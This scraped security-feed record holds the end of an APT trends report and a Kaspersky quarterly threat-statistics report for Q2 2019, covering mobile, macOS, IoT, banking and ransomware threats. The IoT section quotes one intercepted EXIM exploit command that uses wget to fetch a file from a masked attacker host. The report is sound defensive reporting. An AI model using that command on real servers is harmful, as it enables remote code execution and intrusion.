Unfortunately, we couldn't find a decryption key to decrypt the third stage payload, so we don't know what the last part of this malware framework looks like. Although the code is quite sophisticated, we couldn't identify any similarity with other known frameworks.\n\nAarogya Setu is the name of a mandatory COVID-19 mobile tracking app developed by the National Informatics Centre, an organization that comes under the Ministry of Electronics and Information Technology in India. It allows its users to connect to essential health services in India. With cyber criminals and APT actors taking advantage of pandemic-tracking applications to distribute Trojanized mobile apps, we investigated and identified apps that mimic the appearance and behavior of the legitimate Aarogya Setu app while deploying Android RATs. We consider one of these to be a new version of a RAT that we previously reported being used by the Transparent Tribe threat actor.\n\n## **Final thoughts**\n\nThe threat landscape isn't always full of "groundbreaking" events. However, a review of the activities of APT threat actors indicates that there are always interesting developments. 
Our regular quarterly reviews are intended to highlight these key developments.\n\nHere are the main trends that we've seen in Q2 2020.\n\n * Geo-politics remains an important motive for some APT threat actors, as shown in the activities of MuddyWater, the compromise of the Middle East Eye website and the campaigns of CloudComputating and HoneyMyte groups.\n * As is clear from the activities of Lazarus and BlueNoroff, financial gain is another driver for some threat actors - including the use of ransomware attacks.\n * While Southeast Asia continues to be an active region for APT activities, this quarter we have also observed heavy activity by Chinese-speaking groups, including ShadowPad, HoneyMyte, CactusPete, CloudComputating and SixLittleMonkeys.\n * APT threat actors continue to exploit software vulnerabilities - examples this quarter include Hades and MagicScroll.\n * We have noted before that the use of mobile implants is no longer a novelty, and this quarter is no exception, as illustrated by the PhantomLance campaign.\n * It is clear that APT actors, like opportunistic cybercriminals, continue to exploit the COVID-19 pandemic as a theme to lure potential victims. However, we would note once again that this doesn't represent a shift in TTPs.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. 
However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-07-29T10:00:09", "published": "2020-07-29T10:00:09", "id": "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "href": "https://securelist.com/apt-trends-report-q2-2020/97937/", "type": "securelist", "title": "APT trends report Q2 2020", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-08-19T18:27:50", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0798", "CVE-2018-0802", "CVE-2019-0708", "CVE-2019-0841", "CVE-2019-0863", "CVE-2019-0973", "CVE-2019-10149", "CVE-2019-1069", "CVE-2019-11707", "CVE-2019-11708"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.\n * 217,843,293 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.\n * Ransomware attacks were defeated on the computers of 232,292 unique users.\n * Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 753,550 malicious installation packages\n * 13,899 installation packages for mobile banking Trojans\n * 23,294 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ2 2019 will be remembered for several events.\n\nFirst, we uncovered a large-scale [financial threat by the name of Riltok](<https://securelist.com/mobile-banker-riltok/91374/>), which targeted clients of not 
only major Russian banks, but some foreign ones too.\n\nSecond, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts through exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked on the necessary buttons to complete the subscription.\n\nThird, we repeated our [study](<https://securelist.com/beware-of-stalkerware/90264/>) of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.\n\nFourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its thread being terminated, one such adware app launches a music player and plays a silent file. The operating system thinks that the user is listening to music, and does not end the process, which is not displayed on the main screen of the device. At this moment, the device is operating as part of a botnet, supposedly showing ads to the victim. \"Supposedly\" because ads are also shown in background mode, when the victim might not be using the device.\n\nFifth, our attention was caught by the Hideapp family of Trojans. 
These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153149/it-threat-evolution-q2-2019-statistics-1.png>)\n\nFinally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia's largest IT companies:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153203/it-threat-evolution-q2-2019-statistics-2.png>)\n\n### Mobile threat statistics\n\nIn Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153226/it-threat-evolution-q2-2019-statistics-3.png>)\n\nWhat's more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop is the result of less cybercriminal activity in adding members to the most common families. \n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q1 and Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153256/it-threat-evolution-q2-2019-statistics-4.png>)\n\nAmong all the threats detected in Q2 2019, the lion's share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. 
The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).\n\nIn second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).\n\nTrojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) \u2013 this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.\n\nThreats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.\n\nIn Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the [Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) family. 
The most frequently created objects belonged to the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/the-android-trojan-svpeng-now-capable-of-mobile-phishing/57301/>) (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.37 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.31 \n3 | DangerousObject.AndroidOS.GenericML | 5.66 \n4 | Trojan.AndroidOS.Hiddapp.cr | 4.77 \n5 | Trojan.AndroidOS.Hiddapp.ch | 4.17 \n6 | Trojan.AndroidOS.Hiddapp.cf | 2.81 \n7 | Trojan.AndroidOS.Hiddad.em | 2.53 \n8 | Trojan-Dropper.AndroidOS.Lezok.p | 2.16 \n9 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.08 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.93 \n11 | Trojan-Banker.AndroidOS.Asacub.snt | 1.92 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.91 \n13 | Trojan.AndroidOS.Hiddapp.cg | 1.89 \n14 | Trojan.AndroidOS.Dvmap.a | 1.88 \n15 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.86 \n16 | Trojan.AndroidOS.Agent.rt | 1.81 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.58 \n18 | Trojan.AndroidOS.Fakeapp.bt | 1.58 \n19 | Trojan.AndroidOS.Agent.eb | 1.49 \n20 | Exploit.AndroidOS.Lotoor.be | 1.46 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nAs per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.77%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. 
This is basically how the latest malicious programs are detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nFourth, fifth, sixth, seventh, and thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.\n\nEighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.\n\nNinth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking Trojans.\n\nTenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). 
Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153325/it-threat-evolution-q2-2019-statistics-5.png>)\n\n#### Top 10 countries by share of users attacked by mobile malware\n\n| Country* | %** \n---|---|--- \n1 | Iran | 28.31 \n2 | Bangladesh | 28.10 \n3 | Algeria | 24.77 \n4 | Pakistan | 24.00 \n5 | Tanzania | 23.07 \n6 | Nigeria | 22.69 \n7 | India | 21.65 \n8 | Indonesia | 18.13 \n9 | Sri Lanka | 15.96 \n10 | Kenya | 15.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile malware as a percentage of all users of Kaspersky mobile solutions in the country._\n\nAt the head of Q2's Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.\n\nMost often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).\n\nLike Iran, Bangladesh (28.10%) rose one position in our Top 10. 
Most often, users in Bangladesh came across various adware apps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).\n\nThird place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,899** installation packages for mobile banking Trojans, nearly half the number recorded in Q1 2019.\n\nThe largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth place.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153349/it-threat-evolution-q2-2019-statistics-6.png>)\n\n**Top 10 mobile banking Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 13.64 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 13.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.ak | 13.51 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 9.90 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 9.37 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.75 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 4.18 \n8 | Trojan-Banker.AndroidOS.Asacub.cs | 4.18 \n9 | Trojan-Banker.AndroidOS.Agent.eq | 3.81 \n10 | Trojan-Banker.AndroidOS.Faketoken.z | 3.13 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats._\n\nAlmost half our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. 
However, this family's distribution bursts that we registered last quarter were not repeated this time.\n\nAs in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, which is considered one of the longest in existence.\n\n_Geography of mobile banking threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153417/it-threat-evolution-q2-2019-statistics-7.png>)\n\n#### Top 10 countries by share of users attacked by mobile banking Trojans:\n\n| Country* | %** \n---|---|--- \n1 | South Africa | 0.64% \n2 | Russia | 0.31% \n3 | Tajikistan | 0.21% \n4 | Australia | 0.17% \n5 | Turkey | 0.17% \n6 | Ukraine | 0.13% \n7 | Uzbekistan | 0.11% \n8 | Korea | 0.11% \n9 | Armenia | 0.10% \n10 | India | 0.10% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. 
In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.\n\nSecond place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).\n\nThird place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan-Banker.AndroidOS.Grapereh.j (11.80%) were most frequently encountered.\n\n### Mobile ransomware Trojans\n\nIn Q2 2019, we detected **23,294** installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153440/it-threat-evolution-q2-2019-statistics-8.png>)\n\n#### Top 10 mobile ransomware Trojans\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 43.90 \n2 | Trojan-Ransom.AndroidOS.Rkor.i | 11.26 \n3 | Trojan-Ransom.AndroidOS.Rkor.h | 7.81 \n4 | Trojan-Ransom.AndroidOS.Small.as | 6.41 \n5 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.92 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 3.35 \n7 | Trojan-Ransom.AndroidOS.Fusob.h | 2.48 \n8 | Trojan-Ransom.AndroidOS.Small.o | 2.46 \n9 | Trojan-Ransom.AndroidOS.Pigetrl.a | 2.45 \n10 | Trojan-Ransom.AndroidOS.Small.ce | 2.22 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.\n\n_Geography of mobile ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153507/it-threat-evolution-q2-2019-statistics-9.png>)\n\n#### Top 10 countries by share of users attacked 
by mobile ransomware Trojans:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.58 \n2 | Kazakhstan | 0.39 \n3 | Iran | 0.27 \n4 | Pakistan | 0.16 \n5 | Saudi Arabia | 0.10 \n6 | Mexico | 0.09 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Singapore | 0.05 \n10 | Indonesia | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)_ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%)\n\n## Attacks on Apple macOS\n\nQ2 witnessed several interesting events, three of which deserve special attention.\n\nA [vulnerability](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>) was discovered in the macOS operating system allowing Gatekeeper and XProtect scans to be bypassed. Exploitation requires creating an archive with a symbolic link to the shared NFS folder containing the file. When the archive is opened, the file from the shared NFS folder is automatically downloaded by the system without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens were more likely test versions than actual malware.\n\nVulnerabilities detected in the Firefox browser ([CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>), [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>)) allowed arbitrary code to be executed with a view to sandbox escape. After this information was made public, the first exploitations occurred. 
Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.\n\nAlso an interesting vector for delivering a malicious miner to victims was [discovered](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>). The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish \u2013 both QEMU and the miner consume significant resources \u2013 that such a Trojan could not remain unnoticed for long.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.61 \n2 | AdWare.OSX.Spc.a | 12.75 \n3 | AdWare.OSX.Bnodlero.t | 11.98 \n4 | AdWare.OSX.Pirrit.j | 11.27 \n5 | AdWare.OSX.Pirrit.p | 8.42 \n6 | AdWare.OSX.Pirrit.s | 7.76 \n7 | AdWare.OSX.Pirrit.o | 7.59 \n8 | AdWare.OSX.MacSearch.a | 5.92 \n9 | AdWare.OSX.Cimpli.d | 5.76 \n10 | AdWare.OSX.Mcp.a | 5.39 \n11 | AdWare.OSX.Agent.b | 5.11 \n12 | AdWare.OSX.Pirrit.q | 4.31 \n13 | AdWare.OSX.Bnodlero.v | 4.02 \n14 | AdWare.OSX.Bnodlero.q | 3.70 \n15 | AdWare.OSX.MacSearch.d | 3.66 \n16 | Downloader.OSX.InstallCore.ab | 3.58 \n17 | AdWare.OSX.Geonei.as | 3.48 \n18 | AdWare.OSX.Amc.a | 3.29 \n19 | AdWare.OSX.Agent.c | 2.93 \n20 | AdWare.OSX.Mhp.a | 2.90 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nOn the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. 
Among them, members of the Pirrit family were particularly prominent: five positions out of 20.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.11 \n2 | Spain | 9.68 \n3 | India | 8.84 \n4 | US | 8.49 \n5 | Canada | 8.35 \n6 | Russia | 8.01 \n7 | Italy | 7.74 \n8 | UK | 7.47 \n9 | Mexico | 7.08 \n10 | Brazil | 6.85 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)_ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.\n\nIn the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.\n\n## IoT attacks\n\n### Interesting events\n\nIn the world of Linux/Unix threats, the most significant event was the active rise in the number of attacks exploiting a new [vulnerability](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) in the EXIM mail transfer agent. In a nutshell, the attacker creates a special email and fills the recipient field with code to be executed on the vulnerable target mail server. The message is then sent using this server. EXIM processes the sent message and executes the code in the recipient field.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153528/it-threat-evolution-q2-2019-statistics-10.png>)\n\n_Intercepted attack traffic_\n\nThe screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows: \n \n \n /bin/bash -c \"wget X.X.X.X/exm -O /dev/null\n\n### IoT threat statistics\n\nQ2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. 
The assumption is that cybercriminals are gradually switching to more productive hardware enabling the use of SSH. \n \nSSH | 40.43% \nTelnet | 59.57% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019_\n\nHowever, in terms of number of sessions involving Kaspersky Lab [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we see a decline for SSH from 64% in Q1 to 49.6% in Q2. \n \nSSH | 49.59% \nTelnet | 50.41% \n \n_Distribution of cybercriminals' working sessions with Kaspersky Lab traps, Q2 2019_\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153555/it-threat-evolution-q2-2019-statistics-11.png>)\n\n#### **Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps**\n\n| Country | % \n---|---|--- \n1 | Egypt | 15.06 \n2 | China | 12.27 \n3 | Brazil | 10.24 \n4 | US | 5.23 \n5 | Russia | 5.03 \n6 | Greece | 4.54 \n7 | Iran | 4.06 \n8 | Taiwan | 3.15 \n9 | India | 3.04 \n10 | Turkey | 2.90 \n \nFor the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. 
Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.\n\nTelnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.\n\n#### **Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks **\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.92 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 26.48 \n3 | Backdoor.Linux.Mirai.ba | 26.48 \n4 | Backdoor.Linux.Mirai.au | 15.75 \n5 | Backdoor.Linux.Gafgyt.bj | 2.70 \n6 | Backdoor.Linux.Mirai.ad | 2.57 \n7 | Backdoor.Linux.Gafgyt.az | 2.45 \n8 | Backdoor.Linux.Mirai.h | 1.38 \n9 | Backdoor.Linux.Mirai.c | 1.36 \n10 | Backdoor.Linux.Gafgyt.av | 1.26 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks_\n\nAs things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153622/it-threat-evolution-q2-2019-statistics-12.png>)\n\n#### **Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps**\n\n| Country | % \n---|---|--- \n1 | Vietnam | 15.85 \n2 | China | 14.51 \n3 | Egypt | 12.17 \n4 | Brazil | 6.91 \n5 | Russia | 6.66 \n6 | US | 5.05 \n7 | Thailand | 3.76 \n8 | Azerbaijan | 3.62 \n9 | India | 2.43 \n10 | France | 2.12 \n \nIn Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps using the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). 
The US (5.05%), which took second place in Q1 2019, dropped down to seventh.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.\n\n_Number of unique users attacked by financial malware, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153645/it-threat-evolution-q2-2019-statistics-13.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153713/it-threat-evolution-q2-2019-statistics-14.png>)\n\n#### Top 10 countries by share of attacked users\n\n| **Country*** | **%**** \n---|---|--- \n1 | Belarus | 2.0 \n2 | Venezuela | 1.8 \n3 | China | 1.6 \n4 | Indonesia | 1.3 \n5 | South Korea | 1.3 \n6 | Cyprus | 1.2 \n7 | Paraguay | 1.2 \n8 | Russia | 1.2 \n9 | Cameroon | 1.1 \n10 | Serbia | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n#### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 32.2 | \n2 | Zbot | Trojan.Win32.Zbot | 23.3 | \n3 | Emotet | Backdoor.Win32.Emotet | 8.2 | \n4 | Nimnul | Virus.Win32.Nimnul | 6.4 | \n5 | Trickster | Trojan.Win32.Trickster | 5.0 | \n6 | Nymaim | Trojan.Win32.Nymaim | 3.5 | \n7 | SpyEye | Backdoor.Win32.SpyEye | 3.2 | \n8 | Neurevt | Trojan.Win32.Neurevt | 2.8 | 
\n9 | IcedID | Trojan-Banker.Win32.IcedID | 1.2 | \n10 | Gozi | Trojan.Win32.Gozi | 1.1 | \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&C servers, and by early Q3 almost all the C&C botnets were unavailable.\n\nWe also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) appeared in the Top 10 families. They took ninth and tenth places, respectively.\n\n## Ransomware programs\n\n### Quarterly highlights\n\nAfter almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was [shutting down the operation](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>). According to our reports, it was one of the most common ransomware encryptors.\n\nIn Q2, distribution got underway of the new [Sodin](<https://securelist.com/sodin-ransomware/91473/>) ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons. There was the distribution method through hacking vulnerable servers, plus the use of a rare LPE exploit, not to mention the complex cryptographic scheme.\n\nAlso this quarter, there were a few high-profile ransomware infections in the computer networks of [city](<https://threatpost.com/ransomware-florida-city-pays-600k-ransom/145869/>) [administrations](<https://threatpost.com/second-florida-city-pays-hackers-500k-post-ransomware-attack/146018/>). This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough. 
However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.\n\n### Number of new modifications\n\nIn Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.\n\n_Number of new ransomware modifications, Q2 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153736/it-threat-evolution-q2-2019-statistics-15.png>)\n\nThe majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware \u2013 it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim's data inside them in encrypted form.\n\n### Number of users attacked by ransomware 